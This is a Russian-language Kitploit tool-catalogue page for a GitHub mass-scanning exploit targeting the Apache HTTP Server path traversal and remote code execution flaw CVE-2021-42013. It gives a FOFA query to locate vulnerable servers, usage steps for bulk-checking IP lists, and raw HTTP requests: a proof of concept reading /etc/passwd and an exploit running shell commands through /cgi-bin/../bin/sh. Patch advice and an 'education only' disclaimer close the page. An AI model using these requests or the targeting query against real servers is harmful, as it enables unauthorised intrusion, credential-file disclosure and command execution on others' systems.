Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-42013-Apache-RCE-Poc-Exp — Apache массовый инструмент обнаружения удаленного выполнения кода (CVE-2021-42013): Apache HTTP Server — это веб-сервер с открытым исходным кодом, разрабатываемый Apache Software Foundation. Он отличается быстротой, надежностью и расширяемостью через простой API. Было обнаружено, что исправление CVE-2021-41773 в Apache HTTP Server 2.4.50 недостаточно. Злоумышленник может использовать атаку с обходом пути, чтобы отобразить URL на файлы, расположенные вне каталогов, настроенных директивами, такими как Alias. Если эти файлы за пределами каталогов не защищены обычной конфигурацией по умолчанию «Require all denied», такие запросы могут быть успешными. Если для этих путей также включены CGI-скрипты, это может позволить удаленное выполнение кода. Эта проблема затрагивает только Apache 2.4.49 и Apache 2.4.50, но не более ранние версии. | Kitploit
Инструменты/GitHubGitHub/asaotomo/cve-2021-42013-apache-rce-poc-exp
РазведкаСканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubasaotomo/cve-2021-42013-apache-rce-poc-exp

CVE-2021-42013-Apache-RCE-Poc-Exp

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Репозиторий
1024 лет назадЕщё не проверено

Описание

Apache массовый инструмент обнаружения удаленного выполнения кода (CVE-2021-42013): Apache HTTP Server — это веб-сервер с открытым исходным кодом, разрабатываемый Apache Software Foundation. Он отличается быстротой, надежностью и расширяемостью через простой API. Было обнаружено, что исправление CVE-2021-41773 в Apache HTTP Server 2.4.50 недостаточно. Злоумышленник может использовать атаку с обходом пути, чтобы отобразить URL на файлы, расположенные вне каталогов, настроенных директивами, такими как Alias. Если эти файлы за пределами каталогов не защищены обычной конфигурацией по умолчанию «Require all denied», такие запросы могут быть успешными. Если для этих путей также включены CGI-скрипты, это может позволить удаленное выполнение кода. Эта проблема затрагивает только Apache 2.4.49 и Apache 2.4.50, но не более ранние версии.

Поделиться

Название уязвимости

Удаленное выполнение кода в Apache (CVE-2021-42013)

Описание уязвимости

Apache HTTP Server — это веб-сервер с открытым исходным кодом от Apache Software Foundation. Он отличается быстродействием, надежностью и возможностью расширения через простые API. Обнаружено, что исправление для CVE-2021-41773 в Apache HTTP Server 2.4.50 было недостаточным. Злоумышленник может использовать обход пути для отображения URL на файлы вне каталогов, настроенных с помощью директив, подобных псевдонимам. Если файлы за пределами этих каталогов не защищены обычной конфигурацией по умолчанию «Require all denied», такие запросы могут быть успешными. Если для этих путей с псевдонимами также включены CGI-скрипты, это может позволить удаленное выполнение кода. Эта проблема затрагивает только Apache 2.4.49 и Apache 2.4.50, но не более ранние версии.

Затронутые версии

Apache HTTP Server 2.4.49

Apache HTTP Server 2.4.50

Синтаксис FOFA

server="Apache/2.4.49" || server="Apache/2.4.50"

Использование

root@kitploit:~
1. Поместите IP-адреса для проверки в файл ip.txt
2. Запустите python3 check.py
image

POC

root@kitploit:~
GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
image

EXP

root@kitploit:~
GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
Content-Length: 57

echo Content-Type: text/plain; echo;ls /

img

Рекомендации по исправлению

В настоящее время эти уязвимости уже исправлены. Учитывая серьезность уязвимости, рекомендуется немедленно обновить систему до Apache HTTP Server 2.4.51 (выпущен 7 октября) или более поздней версии.

Ссылка для загрузки:

https://httpd.apache.org/download.cgi#apache24

Примечания

Этот инструмент предоставляется только для самостоятельной проверки безопасности специалистами по безопасности. Автор не несет ответственности за любые последствия, вызванные неправомерным использованием пользователями. Пользователи должны обязательно соблюдать местные законы. Данная программа не может использоваться в коммерческих целях, только для обучения и обмена.

147206848-6090876d-d029-4ffd-a6a8-ee4600071404
Скачать инструмент